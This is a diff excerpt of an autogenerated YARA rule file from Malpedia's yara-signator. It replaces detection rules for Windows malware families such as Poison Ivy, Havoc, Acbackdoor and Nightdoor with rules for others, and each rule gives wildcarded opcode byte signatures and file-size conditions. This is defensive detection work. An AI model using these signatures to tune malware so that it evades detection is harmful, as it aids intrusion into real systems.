-		$sequence_2 = { 833800 7411 c1d30b 8b18 0fbdc1 8b45e4 }
-		$sequence_3 = { 2bfa 037d0c 3bc7 72cd 8b4510 33c1 }
-		$sequence_4 = { ba02c10d00 33c8 2bfa 2bca 0faff9 eb46 }
-		$sequence_5 = { ffd0 85c0 7536 8b75ec 83feff 742e }
-		$sequence_6 = { 488bce ff15???????? 488bcd ff15???????? 498bce ff15???????? }
-		$sequence_7 = { 488bcf ff15???????? 83f801 753b }
-		$sequence_8 = { 6a04 6800300000 6a0a 56 ff15???????? 8b3d???????? }
-		$sequence_9 = { 52 8d45d8 50 8b45f8 33c6 }
-		$sequence_10 = { a1???????? 69c941370000 8bfa 33d2 f7f3 33d2 }
-		$sequence_11 = { ffd7 68???????? 8d85f8fdffff 50 ffd6 e8???????? 50 }
-		$sequence_12 = { 4885c0 0f84b8000000 488364242000 4c8d442430 41b930000000 }
-		$sequence_13 = { 7511 488bc5 81e1ff0f0000 482b4630 4a010411 8b4a04 }
-		$sequence_14 = { e8???????? 68???????? ff15???????? 8b3d???????? 8bd8 68???????? 53 }
-		$sequence_15 = { 488d4550 4c8d442450 4183c9ff 33d2 33c9 }
-		$sequence_16 = { 8d41f2 66898552ffffff 83c016 66898554ffffff }
-		$sequence_17 = { 72c8 4c891d???????? 488d0d1fe0ffff ff15???????? 488bc8 e8???????? 488d0dfadfffff }
-		$sequence_18 = { 8b45fc 8b7508 33c3 2bc7 }
-		$sequence_19 = { 3bf0 72e4 eb03 8b55fc }
-		$sequence_20 = { 8b45ec 41 3bc8 72e8 8b7df4 8b45f0 }
-		$sequence_21 = { 8b4dcc 8365f400 894dfc 0fb74b06 2bc7 49 }
-		$sequence_22 = { 6a0c 58 e8???????? 59 85c0 0f849e000000 2b75fc }
+		$sequence_0 = { c78424a002000059335630 c68424a402000000 50 8d8424380a0000 50 ff15???????? }
+		$sequence_1 = { c68424d402000000 c784242c0300005130394e c78424300300005455464f c684243403000000 c78424e402000056464a42 c78424e8020000546c4e47 c68424ec02000000 }
+		$sequence_2 = { 8d85c0f9ffff 66c745e80d0a 6804050000 50 f30f7f45d4 c645ea00 }
+		$sequence_3 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048518ab0110 ff3401 }
+		$sequence_4 = { 85c0 7411 ff35???????? 8bc8 }
+		$sequence_5 = { 8bf0 83feff 0f8489000000 6a00 56 ff15???????? 3d00900100 }
+		$sequence_6 = { 894c2428 ff15???????? 85c0 7430 8b7c2414 8d4900 83f8ff }
+		$sequence_7 = { 64890d00000000 59 5f 5e 8b8c243c100000 33cc }
+		$sequence_8 = { 0fbec2 0fb680d0450110 83e00f eb02 33c0 8bbdc8fdffff 6bc009 }
+		$sequence_9 = { 740b 8d44246c 50 ff15???????? 8b442430 85c0 7409 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Veiledsignal_Auto : FILE
+rule MALPEDIA_Win_Pss_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71866fc5-9473-559b-a801-c95ebfec50c7"
+		id = "8f53afdc-5ec6-5728-abfd-d91f1e9f3440"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.veiledsignal_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pss_auto.yar#L1-L139"
 		license_url = "N/A"
-		logic_hash = "71af0216ed8c73a7deae45ea9d8e0b2ebb718fbb1957e80a9a771dea9a9d10a4"
+		logic_hash = "1278c29ce9286804a6a68366ec725de6162c277ad4b04021e24c075a2ce1e54a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143795,32 +143636,35 @@ rule MALPEDIA_Win_Veiledsignal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c5f92f25???????? 0f82b1000000 48c1e82c c5e9eb15???????? c5f1eb0d???????? 4c8d0d66850000 }
-		$sequence_1 = { e9???????? e8???????? e9???????? 488d0514380400 }
-		$sequence_2 = { 0fb6552f 4c8d4d2f 4533c0 418d4814 ffd0 }
-		$sequence_3 = { 488d0db99a0400 e8???????? 488d0dc59a0400 e8???????? }
-		$sequence_4 = { 7ec4 83c8ff eb0b 4803f6 418b84f7a8140100 85c0 }
-		$sequence_5 = { e8???????? 4881c458010000 c3 8d8146b8ffff 83f801 }
-		$sequence_6 = { e8???????? 488b8890000000 48399938010000 7516 488d05c7390400 4a8b04e8 }
-		$sequence_7 = { ff15???????? e9???????? 8b7c2428 488bcb ff15???????? 85ff 0f844bffffff }
-		$sequence_8 = { 83f8ff 7425 488d1586b10400 8bc8 e8???????? 85c0 740e }
-		$sequence_9 = { 428844f13e 4b8b84e010e70400 42804cf03d04 38558f e9???????? ff15???????? 894597 }
+		$sequence_0 = { 8d48fe e8???????? e9???????? 83f811 }
+		$sequence_1 = { 7437 ff15???????? 3de5030000 752a }
+		$sequence_2 = { ff15???????? 83ceff 3bc6 7504 }
+		$sequence_3 = { 8d4dbc c745fc02000000 e8???????? 8d8550ffffff 50 8d45bc }
+		$sequence_4 = { 6a00 ff15???????? 50 ff15???????? b001 eb24 e8???????? }
+		$sequence_5 = { 8d7f08 8b048d387a0010 ffe0 f7c703000000 }
+		$sequence_6 = { 83feff 0f8413020000 33c0 8d7c2424 ab ab ab }
+		$sequence_7 = { 51 ff75dc ff15???????? 85c0 751c }
+		$sequence_8 = { 8bf0 488bcd ff15???????? 85f6 740f 4439b42488000000 }
+		$sequence_9 = { 90 4c89642420 4c89642428 e8???????? }
+		$sequence_10 = { 48895d90 4c896588 4488642478 448d430c }
+		$sequence_11 = { 750d 48890a 488b4908 44384119 74ea }
+		$sequence_12 = { a801 7524 83c801 8905???????? 488d05c93d0000 488905???????? }
 
 	condition:
-		7 of them and filesize < 667648
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Poison_Ivy_Auto : FILE
+rule MALPEDIA_Win_Daserf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0917932a-f079-5bf1-931c-716d03c726be"
+		id = "9664e62d-eafe-56ce-b464-13f7ca132897"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poison_ivy_auto.yar#L1-L94"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daserf_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "3536834c24827a74ee9df7192a4db2e3644f1cf45a57755c4feba403f8b5bbbf"
+		logic_hash = "bc55f86dc602900cf521d018b673d7e5221e817a978c5aeccfcf33a4e89ac9bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143834,29 +143678,38 @@ rule MALPEDIA_Win_Poison_Ivy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 6a00 8d86120e0000 50 }
-		$sequence_1 = { 683f000f00 6a00 57 51 ff5635 68ff000000 }
-		$sequence_2 = { 51 57 ff9681000000 8d45fc 50 683f000f00 6a00 }
-		$sequence_3 = { 80beaf08000001 7507 b902000080 eb05 b901000080 8d45fc 50 }
-		$sequence_4 = { 8d86120e0000 50 ff75fc ff563d }
-		$sequence_5 = { 51 ff5635 68ff000000 8d86b1060000 50 6a01 6a00 }
-		$sequence_6 = { 57 ff9681000000 80beaf08000001 7507 }
+		$sequence_0 = { 8d1b 0f8e0d010000 87db 8d8568bfffff 8d1b }
+		$sequence_1 = { 56 ff15???????? ff75f8 8b35???????? ffd6 }
+		$sequence_2 = { 9b 68???????? 8bd2 50 f7d0 f7d0 }
+		$sequence_3 = { 6800280000 8d09 8d8568bfffff f7d1 f7d1 53 90 }
+		$sequence_4 = { ff15???????? c705????????01000000 50 53 2d907cb3df }
+		$sequence_5 = { 81ebfff91e8d 81c3fb8dd0b7 2d4e5b5869 2db747503f 05dc183929 81eb25261cb5 }
+		$sequence_6 = { 05e81801ee 95 89ac2400f1ffff 8be8 8b842400f1ffff 81c38b11c7c3 }
+		$sequence_7 = { 2d14be6b51 81c37f189ce5 05a5174ceb 81eb5a34b440 }
+		$sequence_8 = { b8???????? e9???????? 6a0b e9???????? 50 }
+		$sequence_9 = { 81c38ae02de5 81ebb92f9b23 81eb42c7a1f2 81eb74c57063 2d0f027a7d 2db2e0f8da }
+		$sequence_10 = { f7d6 f7d6 81eb8054748e f7d6 f7d6 81c3cb6fc0a8 }
+		$sequence_11 = { 050a037e0a 81ebd4a1a6fb 81c34646dc3b 81c351fc1576 81c3eeb6e6f5 2d8cb08456 }
+		$sequence_12 = { 0589639a4f 81ebc4cfca9c 05e0940a91 81c3df202492 81c304600bef 81eba197b1b7 }
+		$sequence_13 = { 2def0da659 87f6 81eb1c07b732 8bc0 }
+		$sequence_14 = { 81c3787cc718 2ddbcfa691 81c3b7415b90 81c3838339ae 2d5988c64e }
+		$sequence_15 = { 81c38cf537b9 9b 81c339ec068e 7500 053941cb1e }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Qhost_Auto : FILE
+rule MALPEDIA_Win_Kugelblitz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6a3ef66-17d7-58a0-96de-8a0c0984b5c6"
+		id = "db17bbb0-50e5-5fe6-929a-1431a26aafbe"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qhost_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kugelblitz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kugelblitz_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "905b65375bd0a4c7552598ebcf914fdc02a2fd215e8f336ecf0dd12d8b466ba7"
+		logic_hash = "4575fda7b8a74c948e62c70a1906fcade3b297881f83d4f61f7fa59414771962"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143870,32 +143723,32 @@ rule MALPEDIA_Win_Qhost_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8???????? eb0c 8b4dfc 51 ff15???????? }
-		$sequence_1 = { 6a04 8d55f0 52 6a07 8b4508 50 }
-		$sequence_2 = { 50 68???????? 68???????? 680f270000 68???????? }
-		$sequence_3 = { 7430 6a00 6a02 8d55f8 52 6a23 ff55fc }
-		$sequence_4 = { 894da0 8b55a0 3b55a4 0f8d56040000 8d459c }
-		$sequence_5 = { 6880000000 6a00 8d8d74feffff 51 e8???????? 83c40c 8b9570feffff }
-		$sequence_6 = { e8???????? 83c404 e9???????? 83bd68ffffff06 7536 83bd6cffffff00 752d }
-		$sequence_7 = { 52 8b45fc 50 ff15???????? eb4a }
-		$sequence_8 = { 8b8ddcfdffff 51 ff15???????? 83c404 8b95ecfdffff 52 e8???????? }
-		$sequence_9 = { 50 6800040000 8d8d00fcffff 51 8b95c8fbffff 52 }
+		$sequence_0 = { 448bc0 83f8ff 0f8405010000 0f1f440000 488b4de8 }
+		$sequence_1 = { c3 488d0511430000 c3 488d0501430000 c3 }
+		$sequence_2 = { 4053 4883ec20 488bd9 488d0580230000 488901 }
+		$sequence_3 = { 4883c227 488b49f8 482bc1 4883c0f8 4883f81f 7669 }
+		$sequence_4 = { 483bd3 0f8727010000 48896c2430 4883ca07 488b6918 }
+		$sequence_5 = { 488d542448 488d4c2470 480f47542448 e8???????? 488b442470 }
+		$sequence_6 = { 488d0da2410000 e8???????? 85c0 742e 32c0 eb33 }
+		$sequence_7 = { 33db eb49 4881f900100000 7238 }
+		$sequence_8 = { 4a8d1409 e8???????? 48895de8 488b8f80000000 ff15???????? }
+		$sequence_9 = { 488b442470 4533c0 ba02000000 48634804 488d442470 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 82944
 }
-rule MALPEDIA_Win_Acbackdoor_Auto : FILE
+rule MALPEDIA_Win_Boatlaunch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5acb810f-7fcf-50a8-b5e5-5957312412ae"
+		id = "5b0d65d7-386e-5181-abff-96bda8de10ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acbackdoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boatlaunch_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "e7c1851e66beefe0ede613bab170645d1cd40698015b7587734102d809a005df"
+		logic_hash = "adf615ca940a4845de7b709cb5b628615811519e57950596633d26b59f2f2942"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143909,32 +143762,38 @@ rule MALPEDIA_Win_Acbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f8524020000 83fd04 0f8326020000 85ed 0f853c020000 }
-		$sequence_1 = { e8???????? c70424???????? ff15???????? 894500 85c0 7488 803e2f }
-		$sequence_2 = { e8???????? 8b83f0010000 05b8030000 890424 e8???????? 8b83f0010000 89442420 }
-		$sequence_3 = { e8???????? 803f04 89c5 7567 8d440001 39c6 7555 }
-		$sequence_4 = { e9???????? 8b6c2448 8b9c24c0000000 8b83f4000000 85c0 0f85d8020000 8b03 }
-		$sequence_5 = { c783b008000000000000 c7838c05000001000000 c7839005000001000000 c7839405000005000000 895c2404 890424 e8???????? }
-		$sequence_6 = { 8d57fe 0fb7c0 39d0 0f85bc050000 8d4306 8d342b 89442458 }
-		$sequence_7 = { c7442408???????? c7442404???????? 890424 e8???????? 84c0 0f8519050000 8b83e4000000 }
-		$sequence_8 = { ffd0 85c0 0f8863010000 39c5 0f865b010000 29c5 01c7 }
-		$sequence_9 = { c744242005000000 e9???????? 83c803 8906 8b4304 89442410 85c0 }
+		$sequence_0 = { c7430c00000000 c7431000000000 c7431400000000 8d45f0 50 8d45d8 }
+		$sequence_1 = { 8345e802 4b 85db 75af eb05 e9???????? }
+		$sequence_2 = { 0f84b1000000 8b4878 85c9 0f84a6000000 894dec 03cf 894df0 }
+		$sequence_3 = { 7502 48ab 488bfe ffcb 85db }
+		$sequence_4 = { 488b4dd0 e8???????? 488b45d8 488d6528 415b }
+		$sequence_5 = { 8b45e4 03701c 2b75ec 0375e4 ad 85c0 7407 }
+		$sequence_6 = { 448b45fc e8???????? 48894500 48c7c105000000 }
+		$sequence_7 = { 488d6c2430 48c745f800000000 488d35901e0000 488bfe bb40000000 }
+		$sequence_8 = { 488905???????? 48c7c001000000 488d6500 5d }
+		$sequence_9 = { c745f800000000 8d5ddc c70318000000 c7430400000000 }
+		$sequence_10 = { 8d85e0eeffff 50 e8???????? 83c404 53 }
+		$sequence_11 = { 5a 59 5b 5d c3 48894c2408 4855 }
+		$sequence_12 = { ff75f8 e8???????? 81fb02010000 7507 c745fc01000000 8b45fc 5f }
+		$sequence_13 = { c7431400000000 8d45f4 50 8d45dc 50 68ff0f1f00 }
+		$sequence_14 = { 48c7c164000000 e8???????? e9???????? 488d6500 }
+		$sequence_15 = { 4150 4151 4152 4153 4881ec78110000 488dac2480000000 48c745e800000000 }
 
 	condition:
-		7 of them and filesize < 1704960
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Havoc_Auto : FILE
+rule MALPEDIA_Win_Nightdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b73e703-1ccd-5166-ac2d-206885cae394"
+		id = "d8e136f5-ecc5-5fee-8886-ee91c9e305f7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.havoc_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightdoor_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "81f90ef0d0bf3fd238a11a66b3faf732476c67ba4c05a3cc03c8bd35850d8f8f"
+		logic_hash = "d66f399d7d6cc21f703af3dc1753edb59e4b1b5c61847dda1732e7b96de70f40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143948,32 +143807,32 @@ rule MALPEDIA_Win_Havoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7512 31c0 80bc245e01000001 0f94c0 }
-		$sequence_1 = { 4489c0 4501c0 c0e807 4531cf 448a4afe }
-		$sequence_2 = { 884c2439 8a4c243a 8844243a 8a442436 884c2432 8a4c243e 8844243e }
-		$sequence_3 = { 4154 55 89cd b940000000 }
-		$sequence_4 = { 83f902 7512 31c0 80bc245e01000001 0f94c0 }
-		$sequence_5 = { 488b01 ff5018 85c0 75e2 488b0b }
-		$sequence_6 = { 4889cb 4883ec78 4885c9 7507 31c0 e9???????? 4889d1 }
-		$sequence_7 = { 4883ec20 e8???????? 488b06 488b5608 488983f0000000 488993f8000000 488d65f0 }
-		$sequence_8 = { 4989d0 31d2 4c898c2488000000 498b0424 4c8d8c2480000000 4c894c2438 4c894c2428 }
-		$sequence_9 = { 7407 488b442428 eb1b 488b06 4883c9ff }
+		$sequence_0 = { 52 ff15???????? 8b45fc 8b08 51 e8???????? 83c404 }
+		$sequence_1 = { 51 8d4dac e8???????? c7458800000000 eb09 8b5588 }
+		$sequence_2 = { 0f840c020000 6a00 8d4dc0 51 8d55c8 52 }
+		$sequence_3 = { 6a01 e8???????? 83c404 8945fc 8b4d10 51 8b550c }
+		$sequence_4 = { 85c0 7505 8b45fc eb1c 8b4dfc e8???????? 8b4d08 }
+		$sequence_5 = { e9???????? 8b4518 3b450c 7765 8b4d18 51 8b4df0 }
+		$sequence_6 = { ff15???????? 8945e0 837de0ff 7524 ff15???????? 8945dc }
+		$sequence_7 = { 51 ff15???????? 85c0 0f853a030000 8d95d4feffff 52 8d85d4f6ffff }
+		$sequence_8 = { 83c404 b001 e9???????? 83ff0b 7510 8bd6 8bcb }
+		$sequence_9 = { 8b45f0 c7400c00000000 68???????? 8b4df0 83c110 }
 
 	condition:
-		7 of them and filesize < 164864
+		7 of them and filesize < 1124352
 }
-rule MALPEDIA_Win_Ramsay_Auto : FILE
+rule MALPEDIA_Win_Greenshaitan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "591a738b-88c1-5449-9137-a45c1c5654e9"
+		id = "14595aea-9f28-5e60-9b87-81d296b006da"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramsay_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.greenshaitan_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "cc560e807fba4f127cf57dd3774af95181c3332f30b4eada50d5d158e9717780"
+		logic_hash = "1f6063ccf28ef721dc1c6c4df5a5fddba54c56e2e1ec3d58cf26082647681dea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143987,38 +143846,32 @@ rule MALPEDIA_Win_Ramsay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7514 ff15???????? 83f820 7502 eb07 }
-		$sequence_1 = { ff15???????? 85c0 7502 eb02 ebb1 }
-		$sequence_2 = { 85c0 744c c745e800000000 eb09 8b45e8 83c001 }
-		$sequence_3 = { 8b4d08 83c101 51 6a00 8b55f8 }
-		$sequence_4 = { 85c0 751a 8b4df8 51 ff15???????? 8b55fc }
-		$sequence_5 = { 8b5508 8b4508 8a481c 884a0b 8b5508 8b4508 }
-		$sequence_6 = { 837de806 7d34 8b4d08 034de8 0fbe4101 }
-		$sequence_7 = { 884a01 ebbd b801000000 8b4df8 33cd e8???????? }
-		$sequence_8 = { e8???????? 83c404 8945f8 8b45f8 8945fc 8b4d0c }
-		$sequence_9 = { 8955e8 eba5 8b45f4 8be5 }
-		$sequence_10 = { ff15???????? 33c0 e9???????? e8???????? 85c0 }
-		$sequence_11 = { 488d8c24ec040000 ff15???????? 4885c0 7415 488b8c2420090000 }
-		$sequence_12 = { 488d8c24f0020000 e8???????? 4889842420050000 8b842420050000 }
-		$sequence_13 = { 488d8c24f0010000 ff15???????? 488d8c24f0010000 ff15???????? }
-		$sequence_14 = { 488d8c24ec040000 ff15???????? 85c0 7402 }
-		$sequence_15 = { 488d8c24f0010000 ff15???????? 4898 488d84047e040000 }
+		$sequence_0 = { 8d442434 64a300000000 8b6c2444 33db 895c2410 c744242c0f000000 895c2428 }
+		$sequence_1 = { 6a02 68???????? 8d842494000000 e8???????? }
+		$sequence_2 = { 895c244c 668944243c 3974246c 720d 8b4c2458 51 e8???????? }
+		$sequence_3 = { 7594 8b7c2414 83ff01 7534 }
+		$sequence_4 = { ff15???????? 8d442404 c746180f000000 c7461400000000 c6460400 8d5001 8a08 }
+		$sequence_5 = { 3974246c 720d 8b4c2458 51 e8???????? 83c404 8b542430 }
+		$sequence_6 = { 56 e8???????? 56 8bd8 e8???????? 8be8 8b4734 }
+		$sequence_7 = { c74424480f000000 895c2444 885c2434 eb1b 837d6810 7205 8b4554 }
+		$sequence_8 = { 53 890a e8???????? 55 e8???????? 83c408 }
+		$sequence_9 = { 8bf1 8b4814 c744240800000000 7214 8b4004 51 8bd8 }
 
 	condition:
-		7 of them and filesize < 2031616
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Wipbot_Auto : FILE
+rule MALPEDIA_Win_Ripper_Atm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a0970f9-ec33-54d5-ae53-9537a083afd7"
+		id = "8f521802-fe9f-59e3-95e4-5c6b679dd629"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wipbot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ripper_atm_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "fb932c7b46d7c186e09cb261140c60f0fb4b0c9205bd0105a6b5687477b202b2"
+		logic_hash = "20a25cf7a57e29f6fcd47218cda1c983413d86161c6d93b073b8fbc3d2b6ce43"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144032,34 +143885,34 @@ rule MALPEDIA_Win_Wipbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 89cb 48 89d6 b98855514f ba4656f1f6 e8???????? }
-		$sequence_1 = { c744241400000000 c744241800000000 8974240c 89542410 c74424080a000000 890424 }
-		$sequence_2 = { 48 01cb 66813b9090 0f8404040000 bace2cfb69 b98855514f }
-		$sequence_3 = { 85c0 48 8907 74a0 48 83c708 48 }
-		$sequence_4 = { c744240400000000 893424 89442408 ffd7 }
-		$sequence_5 = { ba2e9fd298 b98855514f e8???????? 49 }
-		$sequence_6 = { 89e5 e8???????? 85c0 7405 8b4034 eb02 }
-		$sequence_7 = { 41 b901000000 ba01000000 4c 8d442468 48 8d4c246c }
-		$sequence_8 = { 740d 8b45f4 e8???????? e9???????? 89d8 e8???????? 85c0 }
-		$sequence_9 = { 48 8b442428 eb02 31c0 48 }
+		$sequence_0 = { 51 8bcc 89a57cfdffff 68???????? e8???????? }
+		$sequence_1 = { 2bc1 99 c745f818000000 f77df8 83c410 8945e8 85c9 }
+		$sequence_2 = { c7470411000000 897708 89770c 897710 c707???????? }
+		$sequence_3 = { c3 55 8bec 8b0d???????? 8b15???????? 8bc1 2bc2 }
+		$sequence_4 = { 8b4f3c 50 e8???????? 8b4f3c ff75fc 0fbec0 894744 }
+		$sequence_5 = { 7516 8b7708 8b4610 3b02 0f8d8e000000 ff7514 }
+		$sequence_6 = { 8b4de8 3b4810 7d27 8b4e08 ff7514 80790d00 51 }
+		$sequence_7 = { 68???????? 53 ff15???????? 56 56 50 8945fc }
+		$sequence_8 = { 8bf9 50 e8???????? ff7518 8d45ec ff7514 8bcf }
+		$sequence_9 = { 7409 6aff 53 50 e8???????? be???????? 56 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 724992
 }
-rule MALPEDIA_Win_Suppobox_Auto : FILE
+rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b7250ed-3647-5a89-a116-017b310c526f"
+		id = "9f7dcd3a-83e3-51b1-b972-c6423fd03466"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.suppobox_auto.yar#L1-L191"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_ausov_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "05beb26ad12e675f535ee9462bf9d41a047c1dcd3464f804af01fdd75563ee81"
+		logic_hash = "54e3ad7a65c1020ea5947e1b7fb8d16c99e374f254cf080dd27feb76035c9b99"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -144071,44 +143924,32 @@ rule MALPEDIA_Win_Suppobox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7e10 a1???????? 0305???????? a3???????? }
-		$sequence_1 = { 3bc8 7d10 a1???????? 2b05???????? a3???????? }
-		$sequence_2 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 }
-		$sequence_3 = { 8945f0 a1???????? 83e801 a3???????? }
-		$sequence_4 = { 7412 8b0d???????? 030d???????? 890d???????? }
-		$sequence_5 = { 7d10 a1???????? 0b05???????? a3???????? }
-		$sequence_6 = { 7f10 a1???????? 2305???????? a3???????? }
-		$sequence_7 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a }
-		$sequence_8 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? }
-		$sequence_9 = { 8d48ff 2d9b507602 8985dcfdffff db85dcfdffff }
-		$sequence_10 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a }
-		$sequence_11 = { 8d48ff 2d9696ca2f 39c2 66898d92feffff 0f8dbbfcffff }
-		$sequence_12 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff }
-		$sequence_13 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff }
-		$sequence_14 = { 8d48ff 39c2 890d???????? 0f8e93240000 }
-		$sequence_15 = { 8d48ff 2de13d1921 8985e0f8ffff db85e0f8ffff }
-		$sequence_16 = { 01d7 68???????? 57 e8???????? }
-		$sequence_17 = { 8d48ff 39c2 898db4f8ffff 0f8e3d0f0000 }
-		$sequence_18 = { 01c6 ebdb ff7510 57 }
-		$sequence_19 = { 01c9 4a 79f2 833b54 }
-		$sequence_20 = { 8d48ff 2dbb4fb754 39c2 66890d???????? }
-		$sequence_21 = { 8d48ff 39c2 898dc8feffff 0f8ebb010000 }
+		$sequence_0 = { 83854cfaffff02 80bd46faffff00 75ae c78540faffff00000000 eb0b 1bc0 83d8ff }
